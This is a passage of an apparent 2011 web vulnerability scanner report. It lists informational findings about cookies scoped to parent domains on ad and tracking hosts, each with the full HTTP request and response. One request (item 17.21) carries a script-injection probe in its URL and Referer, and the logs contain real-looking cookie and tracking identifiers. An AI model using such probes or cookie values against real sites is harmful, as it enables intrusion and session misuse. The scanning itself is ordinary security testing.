Set-Cookie: WR540427EECAV6=V1rrrrr"rz%XrQB%eQe@^%riQXzBz^^ezr"%XrQB%iQQiz%XrQB%eQe@"%XrQB%iQQi"%XrQB%iQQiQere@e"rzNV::W~a`G:ka~~xBrfhIcOfmITz(xB$YhIcf2cajhaIFxB$(mG~:3maTfxB[5~I2mFxB[0Iu:hxB[ya~If2:TFxB(IFGz7}zA6YhIcf2cajhaIF6(mG~:3maTf"5~I2mF"0Iu:h"ya~If2:TF|IFG; path=/; domain=ehg-findlaw.hitbox.com; expires=Fri, 11-May-2012 16:42:38 GMT; max-age=31536000
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Thu, 12 May 2011 16:42:39 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
17.15. http://ehg-findlaw.hitbox.com/HGct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-findlaw.hitbox.com
Path:   /HGct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HGct?hc=wp151&hb=WR540427EECA%3BDM54040296DE&cd=1&hv=6&n=/Default%3B/SITE%20PAGE&con=&vcon=/%3B/2069028/powelltrachtman2/www.powelltrachtman.com/PAGES&tt=none&ja=y&dt=11&zo=300&lm=1305216530000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=13&cy=u&hp=u&ln=en-US&vpc=HBX0100u&vjs=HBX0101.01u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=fscontrol&c2=FS%20IV%3A%20FIRMSITE%20IV&c3=&c4=&customerid=&lv.id=&lv.pos=&ra=&rf=http%3A//www.google.com/search%3Fq%3DPowell+Trachtman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&pl=Java%20Deployment%20Toolkit%206.0.240.7%3AGoogle%20Update%3AJava%28TM%29%20Platform%20SE%206%20U24%3ASilverlight%20Plug-In%3AWPI%20Detector%201.3%3A HTTP/1.1
Host: ehg-findlaw.hitbox.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.powelltrachtman.com/
Cookie: CTG=1305216564

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:29 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM54040296DEV6=V1rrrrr"rz%XrQB%eQe^reri%@z%zrzr"%XrQB%eQe^z%XrQB%eQe^"%XrQB%eQe^"%XrQB%eQe^reri%@"rzNV::W~a`G:ka~~xBrfhIcOfmITz5)6<N5xB[<hWIT2cNa3k:h_F6%Q@@iXeirr6%XrQB%eQe^6%6r6r6%6r6r6%*G:ka~~xBQBrfhIcOfmITxB5V::W~a6W::W~axB(c:m6b686r6b"56<N6%6r6%6r"V6%6r6%6rz(xB$Bre^rBixB$G:ka~~fhIcOfmITBxB$kkkxB(G:ka~~fhIcOfmITxB(c:mxB$YjV(}xB$})8(xBrYjV(z7}z)OuKr6^%zA6Bre^rBi6G:ka~~fhIcOfmITB6kkk|G:ka~~fhIcOfmIT|c:m6YjV(}6})8(HYjV(zOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[Y:ka~~xBr8hIcOfmITxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I; path=/; domain=ehg-findlaw.hitbox.com; expires=Fri, 11-May-2012 16:09:29 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%XrQB%eQe^; path=/; domain=.hitbox.com; expires=Fri, 11-May-2012 16:09:29 GMT; max-age=31536000
Set-Cookie: CTG=1305216569; path=/; domain=.hitbox.com; expires=Thu, 19-May-2011 16:09:29 GMT; max-age=604800
Set-Cookie: WR540427EECAV6=V1rrrrr"rz%XrQB%eQe^reri%ez%zrzr"%XrQB%eQe^z%XrQB%eQe^"%XrQB%eQe^"%XrQB%eQe^reri%@"rzNV::W~a`G:ka~~xBrfhIcOfmITz(xB$[a7ID~fz7}zA6[a7ID~fzOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[Y:ka~~xBr8hIcOfmITxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I; path=/; domain=ehg-findlaw.hitbox.com; expires=Fri, 11-May-2012 16:09:29 GMT; max-age=31536000
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Thu, 12 May 2011 16:09:30 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
17.16. http://id.google.com/verify/EAAAAC-ut1obpQ8XP13MxYguTAY.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAC-ut1obpQ8XP13MxYguTAY.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAC-ut1obpQ8XP13MxYguTAY.gif HTTP/1.1
Host: id.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=baxter+hall+attorney&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: SNID=46=75UKMMMrIYXzKnKqc-M9oZ-XHr3U9W6qbpAuec3D=gu5Pa76Vg4Laqygu; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=XFGT4lg_DpGj71fXNRI12T3QgI498DMCm4Vo9l4byW_QpzG-1W0BLR6-HJBfYe0g_Yd3khHZhnqBzpQ9o6NhmExBlmVDocZYG5FHVRmPESjfOu4RHg9_z7GWsQ3WRLNm

Response

HTTP/1.1 200 OK
Set-Cookie: NID=46=dv2klsvhq6Vyg_9uqB5LJLpC397r5yFl9XjJmEvEWJ6QDPeIwsVE0OZ61NlYufWSxmjKyrIvXenGBLy3phyKoxETz_6hSSYQ49bq5s2GKXEN510GOqtUDfXjbe5pan5Q; expires=Fri, 11-Nov-2011 18:45:06 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 12 May 2011 18:45:06 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
17.17. http://id.google.com/verify/EAAAAM2aT2sSooWAii6U_OlsGlM.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAM2aT2sSooWAii6U_OlsGlM.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAM2aT2sSooWAii6U_OlsGlM.gif HTTP/1.1
Host: id.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html
Cookie: SNID=46=MkwBtoKC9VEcGiJtHudKGBVCOmQevqrZpkztj9Wd=TK1gd6IXJih2fiAA; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=XFGT4lg_DpGj71fXNRI12T3QgI498DMCm4Vo9l4byW_QpzG-1W0BLR6-HJBfYe0g_Yd3khHZhnqBzpQ9o6NhmExBlmVDocZYG5FHVRmPESjfOu4RHg9_z7GWsQ3WRLNm

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=46=75UKMMMrIYXzKnKqc-M9oZ-XHr3U9W6qbpAuec3D=gu5Pa76Vg4Laqygu; expires=Fri, 11-Nov-2011 18:35:46 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 12 May 2011 18:35:46 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
17.18. http://id.google.com/verify/EAAAAMIzcwu2zbAQKxdU-MyvDzM.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAMIzcwu2zbAQKxdU-MyvDzM.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAMIzcwu2zbAQKxdU-MyvDzM.gif HTTP/1.1
Host: id.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.semmes.com/offices/salisbury.asp
Cookie: SNID=46=MkwBtoKC9VEcGiJtHudKGBVCOmQevqrZpkztj9Wd=TK1gd6IXJih2fiAA; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Set-Cookie: NID=46=XFGT4lg_DpGj71fXNRI12T3QgI498DMCm4Vo9l4byW_QpzG-1W0BLR6-HJBfYe0g_Yd3khHZhnqBzpQ9o6NhmExBlmVDocZYG5FHVRmPESjfOu4RHg9_z7GWsQ3WRLNm; expires=Fri, 11-Nov-2011 16:11:47 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 12 May 2011 16:11:47 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
17.19. http://labs.natpal.com/trk/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://labs.natpal.com
Path:   /trk/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trk/pixel?trackid=&trkDomain=layserfreiwald.com&referrer=http%3A//www.elawmarketing.com/portfolio/websites/layser-freiwald&pageVisited=http%3A//layserfreiwald.com/&browser=Firefox&browserVersion=4&OS=Windows&maxHeight=1156&maxWidth=1920 HTTP/1.1
Host: labs.natpal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: uid=uidtest; Domain=natpal.com; Expires=Fri, 13-May-2011 18:09:01 GMT; Path=/
Location: http://labs.natpal.com/trk/pixel?trackid=&trkDomain=layserfreiwald.com&referrer=http%3A//www.elawmarketing.com/portfolio/websites/layser-freiwald&pageVisited=http%3A//layserfreiwald.com/&browser=Firefox&browserVersion=4&OS=Windows&maxHeight=1156&maxWidth=1920&npuid=test
Content-Language: en-US
Content-Length: 0
Date: Thu, 12 May 2011 18:09:01 GMT

17.20. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps?file=api&v=2&key=ABQIAAAALN-P99DGUTxv0zLZ3KmoxxSpNqs40LI3jeHQjq0vt6dXRDCS4BROOzR1ECgzSqL6otikI6yLqXbiZg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.google.com

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=17e4fbb79758e821:TM=1305225430:LM=1305225430:S=QjzrLXBxPrkn3hUE; expires=Sat, 11-May-2013 18:37:10 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 18:37:10 GMT
Server: mfe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Expires: Thu, 12 May 2011 18:37:10 GMT
Content-Length: 9977

var G_INCOMPAT = false;function GScript(src) {document.write('<' + 'script src="' + src + '"' +' type="text/javascript"><' + '/script>');}function GBrowserIsCompatible() {if (G_INCOMPAT) return false;
...[SNIP]...
17.21. http://meter-svc.nytimes.com/meter.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://meter-svc.nytimes.com
Path:   /meter.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meter.js?url=http%3A%2F%2Fwww.nytimes.com%2F2010%2F08%2F22%2Fsports%2Fcycling%2F22armstrong.html%3F59261%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E223d24b026d%3D1&referer=http%3A%2F%2Fburp%2Fshow%2F7&callback=v1305230022786 HTTP/1.1
Host: meter-svc.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html?59261%22%3E%3Cscript%3Ealert(1)%3C/script%3E223d24b026d=1
Cookie: RMID=de922e2c777a4dcc117c807b; nyt-m=61755AB5B621ED6279F440ECA861ED6F&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.20.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199757505:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 19:53:44 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Pragma: no-cache
Server: nginx/0.7.59
Set-Cookie: nyt-m=63287DEF2409E7B7D9BE087FA2837C71&e=i.1306900800&t=i.20&v=i.1&l=l.15.2851997893.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.1.0.0.0&pr=l.4.21.0.0.0&vp=i.0&gf=l.20.2851997893.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; expires=Tue, 10-May-2016 19:53:44 GMT; path=/; domain=.nytimes.com
Content-Length: 113
Connection: keep-alive

v1305230022786({"hitPaywall":false,"counted":true,"loggedIn":false,"hash":"63287DEF2409E7B7D9BE087FA2837C71"});
17.22. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dc048d9159e4ae3 HTTP/1.1
Host: pixel.33across.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: 33x_ps=u%3D7708659745%3As1%3D1304431102142%3Ats%3D1304431102142

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7708659745%3As1%3D1304431102142%3Ats%3D1304431102142; Domain=.33across.com; Expires=Fri, 11-May-2012 16:11:58 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 16:11:57 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;
17.23. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=1c6323e9-0811-5464-3af4-c00f47248395&rtb=1xcfgwn0ixqhg HTTP/1.1
Host: r.openx.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: i=de6f5b1d-dd7a-4d95-8142-2b91139d25bd

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:12:00 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=de6f5b1d-dd7a-4d95-8142-2b91139d25bd; expires=Sat, 11-May-2013 16:12:00 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
17.24. http://u.openx.net/w/1.0/sc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://u.openx.net
Path:   /w/1.0/sc

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/1.0/sc?r=http%3A%2F%2Fox-d.gartner.com%2Fw%2F1.0%2Fajs%3Fo%3D8647305838%26pgid%3D2196%26tg%3D_self%26res%3D1920x1200x16%26plg%3D%26ch%3Dutf-8%26tz%3D300%26c.creative%3Dremote%26url%3Dabout%253Ablank%26cb%3D8647305838%26cc%3D1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: u.openx.net

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: i=0549e3e5-f49b-45bc-aa95-db63c9210df3; Version=1; Expires=Fri, 11 May 2012 20:21:48 GMT; Max-Age=31536000; Domain=.openx.net; Path=/
Server: MochiWeb/1.1 WebMachine/1.7.2 (participate in the frantic)
P3P: CP="CUR ADM OUR NOR STA NID"
Location: http://u.openx.net/w/1.0/sc?r=http%3A%2F%2Fox-d.gartner.com%2Fw%2F1.0%2Fajs%3Fo%3D8647305838%26pgid%3D2196%26tg%3D_self%26res%3D1920x1200x16%26plg%3D%26ch%3Dutf-8%26tz%3D300%26c.creative%3Dremote%26url%3Dabout%253Ablank%26cb%3D8647305838%26cc%3D1&cc=1
Date: Thu, 12 May 2011 20:21:48 GMT
Content-Length: 0
Connection: close

17.25. http://vlog.leadforce1.com/bf/bf.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vlog.leadforce1.com
Path:   /bf/bf.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bf/bf.php?idsite=6246&url=http%3A%2F%2Fwww.centrifugesystems.com%2F&res=1920x1200&h=14&m=27&s=55&cookie=1&urlref=&rand=0.671025766331095&pdf=0&qt=0&realp=0&wma=0&dir=0&fla=0&java=1&gears=0&ag=1&action_name=&title=Data%20Visualization%20Software%20%E2%80%93%20Link%20%26%20Data%20Analysis%20by%20Centrifuge%20Systems&_lf1=&vt_=YTM4MWJhY2RhNDE1OWIwODIzYzA3YzE0NDAyNGRjMDk%3D HTTP/1.1
Host: vlog.leadforce1.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.centrifugesystems.com/

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 12 May 2011 19:27:57 GMT
Content-Type: image/gif
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: CP='OTI DSP COR NID STP UNI OTPa OUR'
Set-Cookie: lf1_visitor6246=1%3DZjg1MWEzNGFmMWJkZWI5ZjdiOTEwNjYxNTkyOTY0MDM%3D%3A2%3DMTMwNTIyODQ3Nw%3D%3D%3A3%3DMTMwNTIyODQ3Ng%3D%3D%3A4%3DNjA4MDQ2NTE%3D%3A5%3DNjczMzMxMw%3D%3D; expires=Sat, 11-May-2013 19:27:57 GMT; domain=.leadforce1.com
Set-Cookie: lf1_visitor6246=deleted; expires=Wed, 12-May-2010 19:27:56 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;
17.26. http://www.bing.com/fd/fb/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/fb/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/fb/r?v=7_04_0_925756&sId=0 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bing.com/search?q=gigablast.com&src=ie9tr
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: FBB=R=0; SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHD=MS=1767793&SM=1&D=1593447&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; _UR=OMW=0; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c0a2bc88e712d46c3bff774df04608da4; _SS=SID=357505634DE040F7AAB78C84F4F41453&CW=1067&CH=808; RMS=F=OAAg&A=QAAAAAAAAAAQAAAQB

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=15552000
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Thu, 12 May 2011 15:13:54 GMT
Connection: close
Set-Cookie: SRCHD=MS=1767793&SM=1&D=1593447&AF=NOFORM; expires=Sat, 11-May-2013 15:13:54 GMT; domain=.bing.com; path=/
Content-Length: 2175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; char
...[SNIP]...
17.27. http://www.bing.com/fd/ls/GLinkPing.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/GLinkPing.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/ls/GLinkPing.aspx?IG=0a2bc88e712d46c3bff774df04608da4&CID=F741A5D3C8544F77A0B57D8439E7E06E&PM=Y&ID=SERP,5074.1 HTTP/1.1
Accept: */*
Referer: http://www.bing.com/search?q=gigablast.com&src=ie9tr
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHD=MS=1767793&SM=1&D=1593447&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; _UR=OMW=0; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c0a2bc88e712d46c3bff774df04608da4; _SS=SID=357505634DE040F7AAB78C84F4F41453&CW=1067&CH=808; RMS=F=OAAg&A=QAAAAAAAAAAQAAAQB

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Thu, 12 May 2011 15:13:58 GMT
Connection: close
Set-Cookie: SRCHD=MS=1767793&SM=1&D=1593447&AF=NOFORM; expires=Sat, 11-May-2013 15:13:58 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;
17.28. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?q=gigablast.com&src=ie9tr HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: www.bing.com
Proxy-Connection: Keep-Alive
